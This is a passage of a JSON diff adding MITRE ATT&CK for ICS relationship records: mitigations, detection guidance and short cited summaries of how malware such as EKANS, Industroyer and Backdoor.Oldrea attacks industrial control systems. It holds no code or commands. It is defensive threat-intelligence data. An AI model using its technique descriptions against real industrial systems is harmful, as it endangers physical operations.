", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c5fd0969-c151-4849-94c2-83e2e208cff7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.168Z", + "relationship_type": "mitigates", + "description": "Ensure that wired and/or wireless traffic is encrypted when feasible. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5ae1cf3a-2603-4bf9-ace3-5b1ee5d8d757", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.180Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict program uploads to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5d4f6aff-650c-45fe-a9d8-2080d3ea02d7", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:48:51.528Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b3b24837-83ed-46c5-ba80-66a832c7072e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.062Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--dc35c44a-a90c-48a1-8811-af2618216e42", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:45:08.648Z", + "description": "Use strong multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials. 
Be aware of multi-factor authentication interception techniques for some implementations.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0aee02c-b424-4781-be10-793d71594c31", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:23:47.107Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) RAT is distributed through a trojanized installer attached to emails. 
(Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--71e9230d-eec8-4ce1-bc96-9288bacc8b13", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:44:01.639Z", + "description": "To protect against AiTM, authentication mechanisms should not send credentials across the network in plaintext and should also implement mechanisms to prevent replay attacks (such as nonces or timestamps). Challenge-response based authentication techniques that do not directly send credentials over the network provide better protection from AiTM.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7ca9443-f833-4636-9c30-fcaddd3516c6", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:33:22.909Z", + "description": "Monitor for changes made to Windows registry keys and/or values that may stop or disable services on a system to render 
those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--567acebd-4ba2-4723-a74d-514992321ccc", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:03:27.702Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "Ensure proper network segmentation between higher level corporate resources and the control process environment.\n", + "source_ref": 
"course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Ben Hunter and Fred Gutierrez July 2020", + "description": "Ben Hunter and Fred Gutierrez 2020, July 01 EKANS Ransomware Targeting OT ICS Systems Retrieved. 2021/04/12 ", + "url": "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems" + }, + { + "source_name": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020", + "description": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly 2020, July 15 Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT Retrieved. 2021/04/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:45:28.094Z", + "description": "Before encrypting the process, [EKANS](https://attack.mitre.org/software/S0605) first kills the process if its name matches one of the processes defined on the kill-list. (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) EKANS also utilizes netsh commands to implement firewall rules that blocks any remote communication with the device. 
(Citation: Ben Hunter and Fred Gutierrez July 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90d9c8e3-0250-4096-8d98-7ca1d324d654", + "created": "2021-04-12T10:12:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:22:33.586Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload has the capability of enumerating OPC tags, in addition to more generic OPC server information. The server data and tag names can provide information about the names and function of control devices. 
(Citation: ICS-CERT August 2018) (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c2f82ff-bde7-4ab8-b6ab-35d7f7f498dd", + "created": "2022-09-27T15:27:00.387Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:27:00.387Z", + "description": "Networking devices such as switches may log when new client devices connect (e.g., SNMP notifications). Monitor for any logs documenting changes to network connection status to determine when a new connection has occurred, including the resulting addresses (e.g., IP, MAC) of devices on that network.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a6519c11-e9d4-4b6f-8d92-8efaa2144c28", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Davey Winder June 2020", + "description": "Davey Winder 2020, June 10 Honda Hacked: Japanese Car Giant Confirms Cyber Attack On Global Operations Retrieved. 
2021/04/12 ", + "url": "https://www.forbes.com/sites/daveywinder/2020/06/10/honda-hacked-japanese-car-giant-confirms-cyber-attack-on-global-operations-snake-ransomware/?sh=2725c35753ad" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:47:16.775Z", + "description": "[EKANS](https://attack.mitre.org/software/S0605) infection resulted in a temporary production loss within a Honda manufacturing plant. (Citation: Davey Winder June 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c2fe42b4-6750-4b51-86b7-6c37fbfdef2d", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:21.586Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--973f5884-a076-413e-ac96-f0bd01375fb6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.153Z", + "relationship_type": "mitigates", + "description": "Utilize code signatures to verify the integrity of the installed program on safety or control assets has not been changed.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--966b59c0-8641-432c-84f7-b2a712004d74", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:52:41.680Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) IEC 104 module has 3 modes available to perform its attack. These modes are range, shift, and sequence. The range mode operates in 2 stages. The first stage of range mode gathers Information Object Addresses (IOA) and sends select and execute packets to switch the state. The second stage of range mode has an infinite loop where it will switch the state of all of the previously discovered IOAs. Shift mode is similar to range mode, but instead of staying within the same range, it will add a shift value to the default range values. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1dc35f79-0ada-4342-bd13-10d10c1b0335", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Ben Hunter and Fred Gutierrez July 2020", + "description": "Ben Hunter and Fred Gutierrez 2020, July 01 EKANS Ransomware Targeting OT ICS Systems Retrieved. 
2021/04/12 ", + "url": "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:46:56.223Z", + "description": "[EKANS](https://attack.mitre.org/software/S0605) performs a DNS lookup of an internal domain name associated with its target network to identify if it was deployed on the intended system. (Citation: Ben Hunter and Fred Gutierrez July 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--375b7e67-8b3f-4102-9e3e-7e356b6c8bf4", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:43:54.996Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. 
Web Application Firewalls may detect improper inputs attempting exploitation.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1fc147bd-d6ab-4beb-908b-0fbe8e125b76", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.235Z", + "relationship_type": "mitigates", + "description": "Ensure users and user groups have appropriate permissions for their roles through Identity and Access Management (IAM) controls. Implement strict IAM controls to prevent access to systems except for the applications, users, and services that require access. Implement user accounts for each individual for enforcement and non-repudiation of actions.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--aa205915-7571-47ee-8bc6-5aa1ace86690", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:52:11.111Z", + "description": "Devices may produce alarms about restarts or shutdowns. 
Monitor for unexpected device restarts or shutdowns.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--75366cbf-e45f-4cfd-9e76-5af4dfe10766", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.080Z", + "relationship_type": "mitigates", + "description": "Execution prevention may block malicious software from accessing protected resources through the command line interface.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6ad39b3a-a962-457f-852c-be7fc615e22f", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 
2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:00.355Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.111Z", + "relationship_type": "mitigates", + "description": "Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ba010007-6dde-4c9d-8452-69527cd1c2ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.091Z", + "relationship_type": "mitigates", + "description": "Minimize permissions and access for service accounts to limit the information that may be exposed or collected by malicious users or software. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a74c14e2-eb8a-47bb-b64d-20aad9154297", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. 
(Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5714c88f-ca54-46b6-b072-cd1d24714ae0", + "created": "2022-09-29T14:28:08.703Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T14:28:08.703Z", + "description": "Ensure embedded controls and network devices are protected through access management, as these devices often have unknown hardcoded accounts which could be used to gain unauthorized access.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 